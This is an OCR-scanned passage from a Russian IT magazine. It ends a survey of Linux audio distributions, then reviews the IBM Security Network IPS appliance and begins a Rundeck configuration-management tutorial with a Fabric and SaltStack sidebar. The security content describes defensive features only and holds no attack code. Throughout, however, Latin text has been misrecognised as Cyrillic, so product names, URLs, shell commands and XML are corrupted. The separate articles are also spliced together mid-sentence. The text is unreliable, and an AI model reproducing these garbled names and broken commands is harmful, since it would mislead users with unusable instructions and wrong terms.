Ііпих.ѵоѵаае.Іік/ѵоѵаае-трсІ 

Встраиваемый дистрибутив на базе РеЫап 7.1. Последняя 
на момент написания статьи версия содержит МРР 0.18, ядро 
3.8.13 с последними драйверами АІ_ЗА, веб-интерфейс на ос- 
нове МезЫіипл, заявлена также поддержка РоР (РЗР оѵег РСМ, 
упаковка РЗР в фреймы РСМ). Имеется Ѵоуаде МРР Зіаііег КіЦ 
позволяющий собрать аудиостанцию. Стоимость набора 149 
долларов, но звуковая карта в комплект не входит. 

64$ПісІіо 

\ллл/ѵ\л64з1:исІіо.сот 

Дистрибутив (опять же на РеЫап), позиционируется как зато- 
ченный под создание медиаконтента. Имеет следующие осо- 
бенности: Іоѵѵ-Іаіепсу ядро, секвенсоры, такие как Позедагсіеп, 
Агбоиг — мультитрековый звуковой редактор... Однако дистри- 
бутив не обновлялся с 2008 года. 

Шліпіи ЗіисЛо 

иЬипіизіисІіо.ога 

Как говорится, без комментариев. По сути, тот же ІІЬипШ 
с ХРСЕ, заточенный под создание мультимедийного контента. 
Ничем особенным не выделяется — разве только Іоѵѵ-Іаіепсу 
ядром да возможностью поставить на обычный ІІЬипШ метапа- 
кет и превратить в данный дистрибутив. 

АѴЫпих 

ѵѵѵуѵѵ.ЬапбзНеб.пеІ/АѴипих.ИітІ 

Несмотря на название, не антивирус под 1_іпих, а еще один дис- 
трибутив для работы с аудио и видео. Из особенностей можно 
назвать то, что он включает в себя не только свободное ПО, 
но и демоверсии проприетарных продуктов, таких как ЫпихОЗР 
и МіхЬиз. 

ИТОГИ 

І_іпих вполне может использоваться как ПО для аудиоцентров 
и даже как ПО для профессиональной работы со звуком. И если 
первый аспект еще более-менее обозрим (хотя и тут есть свои 
тонкости, как можно было увидеть из вышесказанного), то про- 
фессиональная работа со звуком настолько разнообразна, что 
и в рамках книги ее не охватишь. Статья, однако, такую цель не 
преследовала — мы хотели всего лишь показать, что на осно- 
ве древнего компа можно собрать систему, качество звучания 
которой не будет уступать оборудованию стоимостью в тысячи 
долларов. НЕ 
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ЗАЩИТЫ 



В современных условиях защита периметра 
сети от внешних угроз, основанная на приме- 
нении файрвола, не может обеспечить долж- 
ного уровня безопасности. Атаки становятся 
все более изощренными, поэтому простая 
блокировка портов и контроль состояния со- 
единений оказываются недостаточно эффек- 
тивными средствами. Необходимо использо- 
вать более продвинутые системы класса ІР5, 
глубоко анализирующие трафик. 



ВОЗМОЖНОСТИ ІВМ ІРЗ 

Разработчик: ІВМ 
ѴѴеЬ: \ллллл/.іЬт.сот/ги 

Реализация: программно-аппаратная, образ ѴМѵѵаге 
Лицензия: коммерческая 

Решение от ІВМ обеспечивает блокировку от сетевых атак, ботне- 
тов, червей, комплексную защиту приложений, веб-приложений 
и данных при сохранении высокой пропускной способности. Функ- 
ции брандмауэра позволяют разрешить доступ только по опреде- 
ленным портам и ІР, без необходимости привлечения дополни- 
тельного устройства. Интегрированный модуль ОІ_Р обеспечивает 
мониторинг конфиденциальной информации, проходящей через 
сеть. Система может заглянуть внутрь протокола, определить 
и блокировать паразитный сетевой трафик (вроде Р2Р и ІМ). 
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Как и конкурирующие разработки, для детектирования ІВМ 
Зесигііу использует запатентованную технологию анализа про- 
токолов, обеспечивающую превентивную защиту, в том числе 
и от О-бау угроз. Она основывается на РАМ (РгоіосоІ Апаіузіз 
Мосіиіе, модуль анализа протоколов, аоо.аІ/ЗіКІІ ). сочетающем 
традиционный сигнатурный метод обнаружения атак (Ргоѵепііа 
ОрепЗідпаіиге) и поведенческий анализатор, который вклю- 
чает в себя большое количество эвристических механизмов 
(ЗИеІІсобе Неигізіісз, Іпіесііоп І_одіс Епдіпе и так далее) и позво- 
ляет не полагаться на статические сигнатуры. Всего для анали- 
за трафика используется более 3000 алгоритмов, 200 из них 
распознают РоЗ-атаки. Также РАМ различает более 200 прото- 
колов уровня приложений (атаки на НТТР, РРС, ѴоІР, РРС и так 
далее) и такие форматы данных, как РОС, ХІ_3, РРР, АМ, 6РС, 
кроме того, модуль способен предугадывать место, куда может 
быть внедрен вредоносный код. 

Разработкой РАМ занимается одна из самых известных 
исследовательских групп безопасности в мире — ІВМ Х-Рогсе 
( хіогсе.ізз.пеі ). которая совместно с центром обеспечения 
безопасности СТОС ( уѵеЬарр.ізз.пеі/аіос ) круглосуточно от- 
слеживает угрозы и отвечает за обновление правил. Сигнатуры 
могут создавать сами пользователи, интерфейс предоставля- 
ет все необходимое, а процесс подробно описан в документе 
ОрепЗідпаіиге ІІзег Сиібеііпез ( аоо.аІ/ѵІ-ѵѵІТ ). 

Модульная архитектура РАМ позволяет оперативно добав- 
лять поддержку протоколов и специфические обработчики, по- 
этому его функциональность постоянно развивается. В настоя- 
щее время РАМ поддерживает несколько технологий: 

• ІВМ ѴігіиаІ Раѣсіп — позволяет блокировать известные уязви- 
мости в приложениях и ОС до того, как их разработчики вы- 
пустят официальный патч, соответствующее правило может 
быть создано как в рамках Х-Рогсе, так и администратором 
сети. По умолчанию функция активирована (для всех), но ее 
можно отключить или настроить более тонко согласно дан- 
ным базы сканера безопасности ІЗЗХ-Ргезз ІІрсІаіез (ХРІІ); 

• СІіепі-зісІе арріісаііоп ргоіесѣіоп — защита от атак, направ- 
ленных на пользовательские приложения (М3 ОТТісе, веб- 
браузеры, АсІоЬе РйР и прочие); 

• Абѵапсеб пеіѵѵогк ргоіесііоп — защита от сетевых атак и атак 
на службу 01МЗ; 

• йаіа зесигііу — по сути, модуль ОІ_Р, производящий мони- 
торинг и идентификацию незашифрованных персональных 
и конфиденциальных данных, обеспечивающий контроль 
попыток передачи и отслеживающий перемещения инфор- 
мации внутри сети, что позволяет оценивать риски и блоки- 
ровать утечку. По умолчанию распознаются восемь общих 
типов данных (номера кредиток, телефоны, почтовый адрес 
и так далее), остальную специфическую для организации 
информацию админ настраивает самостоятельно при по- 
мощи регулярных выражений; 

• ѴѴеЬ арріісаііоп зесигііу — очень редкая функция в современ- 
ных ІРЗ, представляет собой аналог файрвола уровня при- 
ложений (ѴѴеЬ Арріісаііоп РігеѵѵаІІ), который защищает веб- 
приложения и СУБД от специфических атак (ЗОІ_ іпіесііоп, 
ШАР іпіесііоп, Х88, ЗЗОІМ Ьііаскіпд, РНР іііе-іпсіисіегз, СЗРР 
и других). Учитывая, что веб-ресурсы открыты и доступны 
в режиме 24/7, атаки на них наиболее распространены, 
а специфика требует особого подхода, поэтому данный мо- 
дуль сегодня весьма востребован; 

• Арріісаііоп сопігоі — модуль контроля приложений, позволя- 
ющий распознавать, ограничивать пропускную способность 
или блокировать Зкуре, Р2Р, ІМ, АсііѵеХ-элементы, попытки 
туннелирования трафика и так далее; 

• ІМеіѵѵогк апотаіу беіесііоп — обнаружение аномалий 
при помощи ЗІЕМ-решений (Зесигііу Іпіогтаііоп апсі Еѵепі 
Мападетепі), вроде ІВМ Зесигііу ОВасІаг, которое пред- 
ставляет собой систему для сбора, анализа, архивирования 
и хранения сетевых журналов сети и журналов событий без- 
опасности. 

Как видно, возможности ІРЗ от ІВМ гораздо шире, чем обычно 
предлагают традиционные решения. 

Параллельно модулю РАМ сетевые пакеты анализирует ЮЗ/ 
ІРЗ Зпогі. Поскольку используется единая очередь, первым 
обработку и выдачу решения может произвести как РАМ, так 
и Зпогі, при этом в журналах могут появляться лишние записи. 




\ѵ\ѵ\ѵ 



Документ ОрепЗідпаіиге 
ІІзег Сиісіеііпез: 

дсо.дІ/ѵІ_ѵѵ2Т 



Например, Зпогі проверил пакет и сгенерировал событие, кото- 
рое попало в журнал, а РАМ его сразу отбросил. Ничего страш- 
ного в таком поведении нет, просто нужно быть в курсе. 

Кроме ІВМ Зесигііу ОВасІаг, поддерживается интеграция 
и с некоторыми другими продуктами ІВМ. Так, с прошивки 4.1 
появилась возможность интеграции с ІВМ Зесигііу АррЗсап (ра- 
нее ІВМ Ваііопаі АррЗсап), который предназначен для тестиро- 
вания приложений на наличие уязвимостей (в работе исполь- 
зуются различные векторы атаки), с целью выявить пробелы 
в безопасности и создать на основе полученных данных новые 
профили защиты. 



Описание ІВМ РгоіосоІ 
Апаіузіз Мосіиіе: 

доо.дІ/ЗіКІІ 

Страница ІВМ Х-Рогсе: 

хіогсе.ізз.пеі 



Страница ІВМ Зесигііу 
ОВасІаг: іЬт.со/1 1 1 РдуЦ 



МЕСТО В СЕТИ 

Устройства ІВМ ІМеіѵѵогк ІРЗ работают на втором (канальном) 
уровне модели ОЗІ, поэтому их внедрение прозрачно и не тре- 
бует вносить изменения в конфигурацию сети. Просто под- 
ключаем в «разрыв», и ІРЗ готова к работе. Такую систему без- 
опасности, не имеющую ІР, труднее обнаружить и распознать. 
Реализовано три режима работы: мониторинг — пассивное 
обнаружение (режим ЮЗ), активная защита (Ргеѵепііоп, режим 
ІРЗ) и имитация (Зітиіаііоп, режим обучения ІРЗ, без блоки- 
ровки). При обнаружении атаки предусмотрен ряд действий: 
блокировка или помещение в карантин удаленного узла (по 
умолчанию один час), отправка предупреждения, игнориро- 
вание, запись трафика атаки (файл совместим с ісрбитр) 
и настраиваемое пользователем действие. Одно устройство 
поддерживает несколько зон безопасности, включая ѴЦ\Ы, 
и может защищать несколько доменов. Предусмотрен широкий 
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ІВМ Зесигііу Меіѵѵогк ІР5 
полностью поддержива- 
ет ІРѵб. 

При наличии нескольких 
устройств обычно 
приобретается ІВМ 
РгоѵепііаМападетепі 
ЗііеРгоіесіог, обеспе- 
чивающий централизо- 
ванное управление всей 
линейкой продуктов 153 
и третьих фирм. 

Анализ сетевых пакетов 
параллельно модулю 
РАМ производит Ю5/ІР5 
Зпогі. 



ЗіІеРгоІесІог обе- 
спечивает управление 
несколькими устрой- 



диапазон по установкам политик, раздельные политики указы- 
ваются для каждого устройства, порта, тега ѴІ_АІ\І, ІР-адреса или 
ІР-диапазона. 

При наличии в сети двух и более устройств ІРЗ можно ак- 
тивировать функцию НідІі АѵаіІаЬіІИу (высокий уровень доступ- 
ности системы). Устройства при этом могут работать в одном 
из двух режимов работы — асйѵе/асИѵе (кластер) или асйѵе/ 
раззіѵе (трафик обрабатывает только один ІРЗ, второй нахо- 
дится в горячем резерве). Высокая готовность обеспечивается 
благодаря возможности переключения на лету между геогра- 
фически распределенными устройствами ІРЗ. В этом случае 
второе устройство подхватывает все соединения, и, что не- 
маловажно, текущие сессии при этом не разрываются (для 
этого трафик со второго устройства зеркалируется). Причем 
возможна тонкая настройка параметров инспектирования па- 
кетов в режиме НА. 

Например, по умолчанию Зпогі; и РАМ анализируют все сое- 
динения, пришедшие с зеркалированного порта (без ответной 
реакции), это позволяет увеличить охват и с большей вероят- 
ностью обнаружить атаку, хотя нередко приводит к созданию 
дублирующих сообщений в ЗКеРгоІесІог (в локальной консоли 
события с зеркального порта не отображаются). При необхо- 
димости такую функцию легко отключить. 

ИНТЕРФЕЙСУПРАВЛЕНИЯ 

Управление всеми версиями ІВМ ІРЗ производится при помо- 
щи веб-консоли (І_осаІ Мападетепі: ІпіегТасе, І_МІ), построенной 
с использованием ^ѵа-технологий (по умолчанию работает 
на стандартном НТТРЗ/443-м порту). С ее помощью можно: 
контролировать состояние устройства, настраивать режимы 
работы ІРЗ, параметры брандмауэра и политики безопасности, 
просматривать оповещения и так далее. Официально поддер- 
живаются веб-браузеры ІЕ или РР, также требуется установлен- 
ный ЗРЕ 1 .6/1 .7 (х64 ЗПЕ не поддерживается). Для запуска І_МІ 
требуется около 1 Гб ОЗУ, поэтому компьютер администратора 
должен обладать соответствующими ресурсами и работать под 
управлением ѴѴіпХР-7. Стоит отметить, что при таких мощных 
возможностях ІРЗ управление остается простым и интуитивно 
понятным. 

Внешний вид веб-консоли можно назвать классическим. 
После входа тебя встречает панель Аррііапсе ОазІіЬоагсІ, ко- 



торая выводит основные сведения и графики с информацией 
о состоянии устройства, сети, количестве инцидентов, за- 
полнении корневого раздела жесткого диска, доступной опе- 
ративной памяти и так далее. Представлен топ- 10 атак, ата- 
кующих и атакуемых. Панели настраиваемые, это позволяет 
вывести востребованные установки и ключевые показатели 
в удобное для просмотра место и отслеживать их состояние, 
когда потребуется. Во многих вопросах, в том числе и при ре- 
дактировании политик, помогают мастеры, и, чтобы добавить 
или изменить параметр, необходимо лишь заполнить предло- 
женные поля. 

Назначение других вкладок понятно из названия: Мопііог 
(состояние и статистика), Зесиге (установки безопасности), 
Мападе (установки системы) и Веѵіеѵѵ (анализ и диагностика). 
При наведении на любой из указанных пунктов появляется 
всплывающее меню, также визуально разделенное на подпун- 
кты, которое позволяет быстро получить доступ к нужной функ- 
ции или настройке. Каждый подпункт, в свою очередь, содержит 
панель ОазІіЬоагсІ, где показаны все связанные события и бо- 
лее полно раскрыты проблемы. Например, в разделе Мопііюг 
находим подпункты ІМеІѵѵогк (состояние сети и пропускная спо- 
собность), Зесигііу (информация по инцидентам, топ атак, ата- 
кующих и атакуемых ресурсов) и Зузіет (состояние, доступные 
и занятые ресурсы). Окно просмотра событий безопасности 
ЗесигИу Еѵепіз не только показывает события (протокол, важ- 
ность, описание и прочее), но и позволяет сразу установить 
действие — игнорировать или блокировать. При добавлении 
пользовательского события появляется окно мастера, в кото- 
ром задается название, домен, действие и так далее. Но здесь 
есть одна тонкость — для переопределенных пользователем 
событий (ІІзег Оѵеггісісіеп) к ним впоследствии нельзя при- 
менить Х-Рогсе ѴігШаІ РаІсН. Политики ѴѴеЬ арріісайоп зесигііу 
позволяют защитить несколько доменов. Чтобы активировать 
ответную реакцию, достаточно просто перейти в подменю 
и установить соответствующие флажки (включить, отобразить 
или заблокировать). Аналогично просто настраиваются прави- 
ла ТігеѵѵаІІ, нажимаем «АбсІ» и заполняем/выбираем значения 
вокнеАбсІ РігеѵѵаІІ Пиіез. 

Несмотря на большое количество функций, разобраться 
с конфигурацией, если ты представляешь, что нужно делать, 
довольно легко. Чтобы освоиться, достаточно потратить часок- 
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В прошивке 4.6 появи- 
лась возможность ис- 
пользования 1-од Еѵепі 
ЕпИапсесІ формата 

Линейка устройств 
ІВМ Зесигііу Ыеіѵѵогк 
ІР5 состоит из аппа- 
ратных и программных 
решений 



другой. О простоте настроек говорит то, что курсы обучения за- 
нимают всего один день. 

Для управления предусмотрено несколько типов учетных 
записей (локально разрешено входить только встроенным гооі: 
и асіпліп), для аутентификации может использоваться ШАР, 
в том числе и Асііѵе Оігесіогу. 

Кроме І_МІ, возможно управление рядом настроек при по- 
мощи консоли (подключение по ЗЗН) и посредством кнопок 
на лицевой панели устройства. Для получения статуса поддер- 
живается работа по ЗІММР 

При наличии нескольких устройств обычно приобретается 
ІВМ Ргоѵепііа Мападеплепі: ЗіІеРгоІесІог, в задачи которого вхо- 
дит централизованное управление всей линейкой продуктов 
188 и третьих фирм, сбор и отображение событий в режиме 
реального времени, их фильтрация и анализ, создание отчетов. 

ПОСТАВКА 

Линейка устройств ІВМ Зесигііу ІМеІѵѵогк ІРЗ состоит из аппа- 
ратных решений с производительностью от 10 Мбит/с до 15 
Гбит/с. Аппаратная платформа гарантированно обеспечивает 
высокую пропускную способность (до 160 тысяч соединений), 
низкую задержку (< 150 мкс) и большое время безотказной 
работы. Младшие модели СХ3002 и СХ4002 предназначены 
для удаленных филиалов (СХ3002 поставляется в десктопном 
форм-факторе), старшие — защиты больших сетей. Внутри 
устройств все подсистемы дублированы: РАЮ, два блока пи- 
тания, два вентилятора охлаждения. Встроенные и внешние 
Ьуразз-модули (например, ІВМ Зесигііу ІМеІѵѵогк Асііѵе Вуразз) 
позволяют передавать данные в обход устройства в случае си- 
стемной ошибки или сбоя в электропитании. 

Также представлены два варианта ІРЗ (СѴ200 и СѴ1000) 
в виде виртуальной системы (Ѵігіиаі Аррііапсе), они предна- 
значены для защиты как виртуальных, так и физических сетей 
с тем же уровнем безопасности, что и аппаратные решения. 
Для установки используются продукты ѴМѵѵаге. Во время уста- 
новки Ѵігіиаі Аррііапсе будет создано три сетевых интерфейса: 
управления (Мападетепі рогѣ), защищаемой сети (Тѵѵо І_ауег 
2 зепзіпд) и ІРЗ (для сброса ТСР-соединений). 



\ѴАІШШС 

Некоторые параметры 
правил Зпогѣ в ІВМ 
Зесигіѣу Иеѣѵѵогк ІРЗ 
не поддерживаются. 




ВОЗМОЖНОСТИ 
НОВОЙ ПРОШИВКИ 



В настоящее время актуальная версия аппа- 
ратной прошивки — 4.6 (вышла в конце марта 
2013-го), включающая в себя ряд новых функций. 
В основе лежит Зпогі 2.9.3. 1 с новыми поли- 
тиками по умолчанию. Формат журнала Зпогѣ 
изменен, чтобы лучше отслеживать установки 
политик. При анализе события можно просмо- 
треть правило, его вызвавшее. Также теперь 
отображаются данные НТТР-запросов (конфигу- 
рируется в Зесиге Ргоіесііоп Зеіііпдз — > АбѵапсесІ 
ІРЗ — > ЗЫОРТ Сопіідигаііоп апсі Риіез). Формат 
данных, передаваемых внешней ЗІЕМ-системе, 
изменен на ІРРІХ (ІР РІоѵѵ Іпіогтаііоп Ехрогі), 
а для переадресации журнала используется 
І_ЕЕР (І_од Еѵепі: ЕпІіапсесІ) формат, который 
совместим с ОВасІаг 31 ЕМ (соответствующие на- 
стройки находятся в Мападе Зузіет Зеіііпдз — > 
Аррііапсе — ► Пеплоіе Оа\а РІоѵѵ СоІІесІіоп и 1_ЕЕР 
І_од Рогѵѵагсііпд (зузіод)). Для работы этой 
функции требуется также обновление модуля 
РАМ. Правда, некоторые модели не поддержи- 
вают новый формат ( (3X6116, СХ7412, СХ7412-05 
и другие). 

В политике Зесигііу Іпіегіасез (находится 
в Мападе Зузіет ЗеПіпдз — » ІМеІѵѵогк) появился 
параметр ВероП Ііпк, отвечающий за отображе- 
ние состояния порта. Его отключение позволит, 
например, не выводить ошибки неиспользуемых 
портов. В Типіпд Рагапгіеіегз (Зесиге Ргоіесііоп 
Зеіііпдз — > АсІѵапсесІ ІРЗ) добавлено почти 20 
новых параметров, позволяющих более тонко 
настраивать работу ІРЗ, сбор статистики и жур- 
налирование пакетов. Изменены некоторые 
виды отчетов. Для (ЗѴ200 и СѴ1000 официально 
поддерживаются ѴМѵѵаге ЕЗХі 5.0 и 5.1 . Под- 
держка ѵ4.3 будет прекращена в апреле 2013 
года, ѵ4.4 — в августе 2013-го, ѵ4.5 — в апреле 
2014 года. 



ВЫВОД 

Возможности ІВМ Зесигііу ІМеІѵѵогк ІРЗ действи- 
тельно впечатляют, на этот продукт не зря обра- 
щали внимание независимые эксперты по без- 
опасности и специализированные издания. Также 
можно отметить простое внедрение, качествен- 
ную документацию (правда, на английском), на- 
личие нескольких обучающих роликов, которые 
позволяют быстрее разобраться с настройками 
устройств. НЕ 
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Унифицируем управление системами 
при помощи Яипйеск 

Настройку большого количества серверов упрощают системы 
управления конфигурациями СНеТ, Рирреі, СРЕпдіпе, позволя- 
ющие быстро привести сервер в нужное состояние. Но задачи 
автоматизации часто выходят за рамки возможностей инст- 
рументов, а в сложных средах число различных параметров 
и флажков к рецептам начинает превышать число рецептов. 

В итоге инструменты сами становятся источником проблем. 
Использование Випсіеск позволяет объединить и контролиро- 
вать все, что есть. 



ВОЗМОЖНОСТИ ВІІНОЕСК 

Випсіеск ( гипсіеск.ога ) представляет собой кросс- 
платформенный инструмент, позволяющий авто- 
матизировать в ЦОД любые команды, скрипты 
и процедуры. Созданные при помощи командной 
строки или через веб-интерфейс задачи могут 
быть запущены по требованию или по расписа- 
нию на любом количестве узлов, администратор 
получает полную информацию о ходе и результа- 
те выполнения. Доступны и другие необходимые 
в распределенных средах возможности: контроль 
доступа, создание цепочки событий (многошаго- 
вый сценарий), планирование, история и аудит. 



Проект возник не на пустом месте. Он осно- 
ван на СопІтоІТіег ( сопІгоШег.ога ). от которого 
Випсіеск отделился в 2010 году. Со временем 
большинство разработчиков перешли в новый 
проект, как более перспективный. В Випсіеск был 
опробован и реализован так называемый сцена- 
рий-ориентированный подход, создан интерфейс 
для фильтрации команд и скриптов для наборов 
узлов и предложена возможность использовать 
внешние поставщики данных. В отличие от мо- 
нолитного СопІтоІТіег, Випсіеск поддерживает 
возможность интеграции с другими инструмен- 
тами: РирреТ СНеТ Ѵадгапі:, ^пкіпз, ІМехиз, СИ: 



и Аплагоп ЕС2. Практически все дополнительные 
функции подключаются в качестве плагинов, ко- 
торые представляют собой файлы, обеспечиваю- 
щие поддержку одного или нескольких сервисов 
(Зегѵісе Ргоѵібег). Реализовано несколько типов 
плагинов, позволяющих добавить шаг рабочего 
процесса, описание нод (Везоигсе МобеІ), меха- 
низм исполнения и копирования файлов, пред- 
упреждения. Правда, в настоящее время реали- 
зованы в основном плагины, предоставляющие 
возможность получать информацию о нодах. 
Ссылки на некоторые плагины можно найти, пе- 
рейдя по адресу гипсіеск.ога/ріиаіпз . 

По сути, Випсіеск является связующим зве- 
ном, объединяющим все средства управления, 
он позволяет из одной точки управлять задани- 
ями и отслеживать результат. То есть информа- 
цию об узлах мы можем брать прямо с аккаунта 
Атагоп ЕС2, а сервис разворачивать при помощи 
зТіеІІ или СНеТ но запускать все это средствами 
Випсіеск, организуя в единое задание с другими 
скриптами и командами. Сами задания объеди- 
няются в проекты, а проекты — в группы. Зада- 
ния можно выполнять параллельно сразу на всех 
узлах или последовательно. Предусмотрено 
оповещение о результате выполнения работы 
посредством етаіі или отправки РОЗТ-запроса 
по определенному ІІВІ_. 

Випсіеск представляет собой серверное при- 
ложение. Информация и история заданий хранит- 
ся в базе данных, выходные данные команд и за- 
дания сохраняются в виде ХМ І_- фай лов на диске. 
Кроме СШ и СЫ, также доступен ѴѴеЬ АРІ, позво- 
ляющий взаимодействовать с сервером Випсіеск 
в программах и скриптах. 
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Создаем новый проект 

<г 

Добавляем команды, 
подключаем фильтры 




РАВРІС И ЗАИ8ТАСК 

РаЬгіс ( ) позволяет выполнять 

практически любые задачи админи- 
стрирования, запуская выполнение па- 
раллельно на нескольких компьютерах. 
В простейшем случае это несколько стан- 
дартных команд, но при наличии навы- 
ков программирования на РуІІіоп можно 
создавать более сложные конструкции, 
обрабатывая вывод и возможные ошиб- 
ки. Каких-либо готовых рецептов проект 
не предоставляет, но в интернете можно 
найти большое количество примеров 
для самых разных сценариев, которые 
можно использовать как основу для сво- 
их проектов (или просто для изучения). 
На управляемых системах не нужно уста- 
навливать дополнительное ПО, необхо- 
дим лишь работающий 53Н-сервер. 

В ІІЬипШ, РеЫап и производных 
от них дистрибутивах команда установки 
проста: 



Принцип работы прост. Администратор вводит 
командуй выбирает по фильтру узлы, запуская за- 
дание (ІЧосІе Ехесиііоп). Каждый узел представлен 
как Везоигсе МосІеІ и имеет определенные при- 
знаки (параметр: значение), которые могут быть 
расширены. Например, теги позволяют быстро 
отобрать группу нод по некоторому критерию. 

Развертывание Випбеск упрощает то, 
что не нужно устанавливать на нодах клиентское 
ПО (этим он отличается от СопІтоІТіег). Для управ- 
ления удаленными системами и передачи файлов 
по умолчанию используется ЗЗН/5СР. Это очень 
удобно, так как даже для того, чтобы выполнить 
простую команду, не надо логиниться на каждом 
сервере. При этом довольно просто можно под- 
ключить любой другой механизм (среди плаги- 
нов доступен ѴѴіпРМ) или использовать внешний 
скрипт. 

При создании проекта доступен вариант ЗШЬ, 
позволяющий просмотреть запускаемые коман- 
ды без выполнения. Это очень полезно, когда 
требуется понять, что именно будет сделано. 
Поддерживается контроль доступа на основе по- 
литик, а также интеграция с ШАР и АЭ. 

Написан Рипсіеск на ^ѵа, его можно уста- 
новить на все популярные ОС — 1_іпих, ѴѴіпсІоѵѵз, 
Зоіагіз и 08 X. 

СТАВИМ ПІШОЕСК 

Для установки в І_іпих предлагается ОЕВ-пакет, 
ВРМ-репозиторий и универсальный Іаипсііег. 
Рекомендуется использовать возможности па- 
кетных менеджеров дистрибутива, в этом случае 
будут созданы все необходимые файлы. В ІІЬипіи 
и ОеЬіап процесс очень прост. 



$ ы^еі: -с Ы=1=р : //сіоыпіоасі . с . ог^/с!еЬ/«— ■ 
гипсІеск-1.5.3-1-6А.сІеЬ 
$ зисіо сірк^ -і гипсІеск-1.5.3-1-(зА.сІеЬ 

Конфигурационные файлы сервиса находятся 
в каталоге /еіс/гипсіеск, здесь можно установить 
параметры среды и работы сервиса, настроить 
АСІ_ (абпліп.асіроіісу), включить 53І_, указать на- 
стройки проекта по умолчанию (ргоіесЕргореПіез) 
и так далее. Их можно пока не трогать, достаточно 
просто познакомиться, чтобы знать, что где лежит. 

По умолчанию демон не запущен: 

$ 5 ибо зегѵісе гипсіесксі зіагЕ 

Если для дистрибутива пакет не собран, тогда 
придется использовать Іаипсііег. После запуска 
инсталлятора необходимо будет ответить на пару 
вопросов. 

$ 5 ибо іаѵа -іаг <-■ 

г ипсіеск- Іаипсііег- 1. 5 . Зраг 

Подключаемся к веб-интерфейсу ІосаІІіозЬ 
4440 (при необходимости порт можно изме- 
нить в файле Тгатемогк.ргорегйез, параметр 
Ітатеѵѵогк.зегѵег.игІ), по умолчанию создаются 
две учетные записи: «абтіп/асітіп» и «изег/изег». 

Интерфейс очень прост, и, несмотря на от- 
сутствие локализации, разобраться с ним труда 
не составит. После регистрации видим три вклад- 
ки: Пип (выполнение команд для нод, отобранных 
при помощи фильтра), ОоЬз (просмотр, создание 
и запуск заданий) и Нізіогу (просмотр выполняе- 
мых и выполненных заданий). 



$ зисіо ар1=-^е1= -у іпзііаіі -РаЬгіс 

Какое-либо конфигурирование 

не требуется, после установки можно 
сразу давать команды удаленным систе- 
мам. 

$ -РаЬ -Н зѵзііеті. зуз1:ет2 <-■ 

-- ипате -а 



После этого будет произведено под- 
ключение к каждому серверу с именем 
текущей учетной записи, для доступа 
потребуется ввести пароль. Результат 
выводится сразу в консоли. Если команд 
много, их объединяют в файл (по умолча- 
нию ТаЬйІе.ру). 

ЗаКЗіаск ( заЦзіаск.сопі ) — еще 
один инструмент для параллельного вы- 
полнения команд на серверах. В нем 
команды и состояние ОС представляют 
собой функции на РуІІіоп. Его главное 
отличие от РаЬгіс — клиент-серверная 
архитектура. Все команды формируют- 
ся на Мазіег-сервере и отправляются 
на подчиненные узлы (Міпіоп). Это по- 
зволяет обрабатывать ошибки штатными 
инструментами, без программирования 
на Руіііоп. Чтобы удобнее отбирать узлы, 
для которых следует выполнить команду, 
используется несколько иерархий: имя, 
дгаіпз (любая информация по ОС — ар- 
хитектура, название, модель СРІІ и так 
далее, полный список доступен по «заіі: 
дгаіпз.Ивтз»), роль. 






8УМ/АСК 
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Выпадающий список позволяет выбрать про- 
ект, но проектов пока нет. При первом входе поль- 
зователь будет сразу переброшен на страницу 
создания нового проекта. В самом простом слу- 
чаедостаточно ввести имя, остальные параметры 
можно заполнить потом. Для создания проекта 
в консоли используется утилита гсі-ргоіесі;: 

$ гб-рго^есЬ -а сгеаѣе -р ехатріез 

Ргоіесі: БігисЕиге сгеаііесі: 
/ѵаг/гипсІеск/рпоіес1=5/ехатр1е5 

Только при использовании консоли есть не- 
большая проблема. Владельцами каталогов про- 
екта являются пользователь и группа гипбеск. 
Под обычной учеткой у пользователя прав не бу- 
дет. В некоторых случаях достаточно добавить 
себя в эту группу, но помогает не всегда. Если 
использовать зибо, владельцем каталога будет 
пользователь и группа гооі. В этом случае нужно 
установить корректные права доступа. 

$ зибо сііоып -К гипбеск: гипбеск /ѵаг/<-< 
гипбеск/рго^есііз/ехатріез 

Основные настройки проекта содержатся 
в конфигурационном файле ргоіесі:. ргорегііез, ко- 
торый находится в подкаталоге еіс папки проекта. 
В нем настроек пока немного. 

$ Бибо саѣ /ѵаг/гипбеск/ргоіесЬ5/<-» 
ехатрІеБ/е-Ьс/рго^есЬ . ргорегЫез 
ргоіесі: . пате=ехатр1е5 
ргоіесі:. гезоигсез .1п1е=/ѵаг/гипбеск/<-< 
рго^есІіБ/ехатрІез/еІіс/пезоипсез .хті 



Результат может быть 
показан в нескольких 
видах и сохранен 
в файл 

\] 

Конфигурационные 
файлы проекта 



шш 

ОписаниеАСІ.: 

ЬіІ.Іѵ/ІбоѴѵМк 

Плагин Атагоп ЕС2: 

ЬіМѵ/ІЗІТОгр 

Скрипт для удобного 
бэкапаНипбеск: 

Ыі.Іѵ/ІІЦаОіѵ 

НипбескѴѴіпНМ 
РІидіп: Ы1.Іѵ/14епЮ8 

Плагин КпіІеѴѴіпбоѵѵз: 

ЫІ.Іѵ/аНгУТ 




ті [ггаіЗііігйгтиМіі*М»ір.и<.1ій.’ярі, і лгс#іІ'т*і. 

ПІЕ Е41 ’ч'ін-іѵ Т4*тігмІ Игір 

5ийо саі /ѵаг/гипйесЬ/ргоіесТз/ехэтрІез/еііс/рго^есі: .рго 

ехлгіріеі 

Шоп 03 23:48:29 ЕЕ5Т 2013 
р го з е о і: - п аае= е тр 1 е$ 

ргоіесі: . ге5оигсе5 . Гі1е=/ѵэг/гипсІеск/рго^есг5/ехатр1е5/еіс/ге5оигсе5.яітіі1 

$ыеЮ оаі /^аг/гипс1оск/ргозесг5/ехатр1е5/о1:с/ге5оигсе5 -* 
<?кш1 ѵегііоп="1 . 0 Н елсосЛпй="иТР-8 ,, ?> 

«річ^есО 

спосіе пате и "ІосаІНо5^" с1е5Сгірі:іоп="Кипгіеск зегѵег пойе'" гад**"" 
гс!і="апк{б4'’ о-іРатіІу^'илік" 05Мапіе= , 'іілик" 05Ѵег5іоп="3.2 .0-23-йепегіс" изегл 

</рго^есс> 



В документации описано большое количество 
дополнительных параметров, позволяющих пере- 
определить установки по умолчанию, часть из них 
устанавливается при помощи веб-интерфейса. 

Нажимаем в браузере <Р5> и видим вновь 
созданный проект. Чтобы познакомиться с интер- 
фейсом, можем просмотреть процесс выполне- 
ния любой команды на локальной системе. Вво- 
дим ее в поле Сотплапб, появляется секция «ІЧоѵѵ 
гиппіпд», отображающая процесс и позволяющая 
просмотреть подробную информацию (консоль- 
ный аналог — команда гб-іоЬз). Ссылка рядом 
